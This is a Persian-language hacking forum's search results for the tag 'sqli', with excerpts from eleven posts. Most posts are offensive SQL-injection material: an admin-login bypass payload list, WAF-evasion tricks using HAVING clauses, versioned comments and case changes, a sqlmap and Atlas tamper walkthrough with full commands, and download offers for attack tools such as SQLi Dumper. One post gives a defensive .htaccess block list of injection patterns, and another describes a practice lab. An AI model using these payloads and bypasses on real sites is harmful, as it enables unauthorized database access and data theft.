discord icon
سرور دیسکورد گاردایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'sqli'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

11 نتیجه پیدا شد

  1. با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : https://www.youtube.com/channel/UCLkbfmELZBnOvh1dwK1hXZw چند نکته مهم :‌ لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .
  2. با سلام خدمت دوستان عزیز گاردایران . در اینجا کدی رو قرار میدم که میتونید از اون برای جلوگیری از اسیب پذیری Sql Injection استفاده کنید اما این رو در نظر داشته باشید که فقط ایمن سازی با htaccess جالب نیست و بهتره در کنارش اسیب پذیری رو از طریق توابع و یا استفاده از PDO و .. رفع کنیم ، ایمن سازی با htaccess فقط برای محکم کاری هست . <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http%3A%2F%2F [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR] RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR] RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR] RewriteCond %{QUERY_STRING} ftp\: [NC,OR] RewriteCond %{QUERY_STRING} http\: [NC,OR] RewriteCond %{QUERY_STRING} https\: [NC,OR] RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR] RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR] RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR] RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR] RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR] RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR] RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR] RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|information_schema|table_name|convert|alter|declare|order|script|set|md5|benchmark|encode|extractvalue|rand()|concat|group_concat|from|From|,|.|+|order|by) [NC,OR] </IfModule> موفق و پیروز باشید .
  3. MR.MSA

    Admin Page ByPass

    با سلام خدمت دوستان گاردایران دوستانی رو توی بخش دیفیس دیدم که میگن برای admin page bypass به غیر از '=''or' چه چیز های دیگه ای میتونیم برای بایپس کردن استفاده کنیم . در این پست براتون کد ها رو میزارم . or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* موفق و پیروز باشید .
  4. MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش ‌: R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .
  5. MR.MSA

    متد Having

    بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
  6. echzed

    bypass NOT ACCEPTABLE

    سلامی دوباره DANTE هستم اینبار اومدم بایپس یک ارور در باگ sqli یا همون sql injection رو معرفی کنم ممکنه ما تا یک جایی پیش بریم ولی با ارور NOT ACCEPTABLE مواجه بشیم اصلا ماهیت این ارور چیه؟ : این ارور نشون میده که سرور اجرای بعضی کد ها رو قفل کرده که ما میتونیم به دو روش دورش بزنیم روش اول: با نوشتن کد زیر /*!50000your_code*/ و به جای your_code دستور که فکر میکنید بلاک شده است را مینویسین روش دوم: بعضی از حروف دستوری که فکر میکنید اشتباه است را بزرگ بنویسید امیدوارم لذت برده باشید
  7. [سطح: متوسط] با عرض سلام و تبریک سال نو به کاربران عزیز من امروز با یه مورد خوب و مشکل گشا توی حملات SQLi مواجه شدم که تصمیم گرفتم بیام براتون توضیح بدم. مساله اینه که بیشترین انگیزه برای حمله برای اکثریت کاربران، حمله به وبسایت های آسیب پذیر در قبال باگ SQL Injection هست لکن بعضی واقع با فایروال هایی مواجه میشن و وقتی کار رو بصورت کامل هم میسپرن به دست sqlmap، باز به مشکل بر میخورن. اینجا مهاجم باید از Tamperها استفاده بکنه تا بتونه فایروال رو بایپس کنه اما یکی دو تا نیستن که و sqlmap هم فقط گاها space2comment رو پیشنهاد میده. چطور میشه کل تمپر ها رو تست کرد؟ با ابزاری به نام Atlas. امروز با ابزار Atlas آشنا میشیم که برای بایپس کردن WAF یا IDS یا IPS و یافتن Tamper مناسب مفید هست. بریم سراغ اصل مطلب. دستورات نصب و اجرای این ابزار توی لینوکس به شرح زیر هست: $ git clone https://github.com/m4ll0k/Atlas.git atlas $ cd atlas $ python atlas.py فرض کنیم لینک اسیب پذیر ما این هست: http://site.com/index.php?id=Price_ASC و پیلود ما هم اینه: -1234 AND 4321=4321-- AAAA برای استفاده از این ابزار باید از دستور اینچنینی استفاده کنید: $ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v حالا این ابزار کجا و چه زمانی استفاده میشه؟ فرض کنید توی sqlmap از این دستور استفاده کردید و با یه WAF برخورد کردید: $ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 تصویر رو ببینید: در اینجا پیلود به شرح زیر هست که توسط WAF یا IPS یا IDS بلاک شده و با خطای 403 Forbidden مواجه شده. پیلود : Price_ASC') AND 8716=4837 AND ('yajr'='yajr کافیه همین پیلود رو ورداریم و بدیم به Atlas با tamper مناسب برای بایپس و حل این مشکل رو پیشنهاد بده. بدین شکل: $ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v حالا نتیجه : میبینیم که در خط سبک رنگ به ما پیشنهاد داده شده که از تمپری به نام Versiondkeywords استفاده کنیم تا اون فایروال روی وبسایت هدف، بایپس بشه. پس از این تمپر بدین شکل استفاده می کنیم: $ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords لینک دریافت Atlas از Github: https://github.com/m4ll0k/Atlas موفق باشید. سوالی هم داشتید در ادامه این تاپیک نپرسید. در تاپیک سوال و جواب بپرسید. Atlas-sqlmap-tamper-suggesy-master.zip
  8. سلام دوستان. از اونجایی که ظاهرا پیر شدیم تو جوونی گفتیم کار بقیه رو اقلا رو راه بندازیم. اینجا افزونه Hackbar Professional رو براتون پیوست کردم. باید بگم که این افزونه علاوه بر نسخه ی اصلیِ hackbar دارای اضافه هایی هست که توی حملات خیلی بدردتون میخوره. مثلا میتونید لینک رو با انواع bypasser هایی که داره تست کنید و نیازی به تایپ دستی نباشه ولی سعی کنید که کد ها رو حفظ کنید و درک داشته باشید نه اینکه فقط چند تا کلیک کرده باشید. ضمناً این افزونه روی Cyberfox 59 هم نصب میشه. سایبرفاکس رو بگیرید و این افزونه رو روش نصب کنید. رمز عبور : guardiran.org Hackbar Professional Moded by r3yz3 - guardiran.org.rar
  9. پیش نیازهای اجرا: .net framework 3.5 + 4.6 Visual C++ 2017 x64/x86 رمز : guardiran.org SQLi Dumper 9.2.1.part4.rar SQLi Dumper 9.2.1.part1.rar SQLi Dumper 9.2.1.part2.rar SQLi Dumper 9.2.1.part3.rar SQLi Dumper 9.2.1.part5.rar
  10. d0kt0r

    Android SQL injection app

    سلام یه نرم افزار ساده واسه SQL inject کردن در محیط اندروید. محیط کار خیلی ساده. Time based injection Error based injection Blind injection Normal injection d0kt0r DroidSQLi.apk
  11. سلام دوستان امروز میخوایم با متد های جالب و بایپس ارور ها در sql injection کار کنیم اول اینکه ما فرض رو بر این میگیرم که شما sqli رو کامل بلدید و فقط نمیتونید بعضی جاهایی که ادمین سایت برای امنیت یه سد هایی رو سر راه ما گزاشته رو بایپس کنیم میریم سراغ آموزش بعد از اینکه ' رو گزاشتیم و صفحه مثل بار اول لود نشد(حالا هرطور دیگه ای.ارور sql .ریدایرکت شدن و...) اولین جایی که ممکنه تو sqli گیر بیفتیم زمانیه که میخوایم ستون هارو پیدا کنیم مثلا target.xxx/index.php?view=blog-detail&newsId=8 تارگت ماست حالا ما میخوایم ستون هاشو بدست بیاریم به این صورت http://target.xxx/index.php?view=blog-detail&newsId=8+order+by+9999-- شاید هر عددی هم که بزاریم باز سایت لود بشه پس بایپس میکینم خب برای اینکه این مشکل رو حل کنیم جلوی value یا همون عدد پشت =یه کوتیشن میذاریم و جلوی اون -- یه+ قرار میدیم و میبینیم مشکل به سادگی حل شد حالا ستون هارو بدست اوردیم http://target.xxx/index.php?view=blog-detail&newsId=8'+order+by+9999--+ به این صورت حالا ستون هاشو بدست اوردیم به طور مثال 8 تا بود حالا بعضی وقتا میبینیم که این کارو کردیم اما دیگه حتی با 1 هم لود نمیشه و ارور میده اینجاس کهه باید بجای order از کلمه group استفاده کنیم که دیگه مطمعنن این سری مشکل رفع میشه اما بعضی وقتا مشکل اساسیه و ارور forbidden میده و اصلا چیزی لود نمیکنه اینجاس که دوباره بایپس لازم میشیم اولین کاری که میکنیم اینه که بجای+--newsId=8'+order+by+9999 http://target.xxx/index.php?view=blog-detail&newsId=8+/*!50000order*/+by+9999-- رو تست میکنیم اگه باز هم نشد برای by هم این رو اضافه میکنیم احتمال زیاد حل میشه اگر باز هم نشد بجای -- عبارت %23 قرار میدیم اگر نشد حروف by / order رو بزرگ میکنیم اگه عمل نکرد میرسیم به اخرین راه قبل از کلمه order /**x**/ x میتونه هر حرفی باشه اضافه می کنیم اگر باز هم ارور داد از جلوی order پاک میکنیم و جلوی by میاریمشکه این سری به احتمال 99 درصد جواب میده خب فکر کنم زیاد طولانی شد ادامه جلسه برای هفته بعد تا خسته نشید تشکر یادتون نره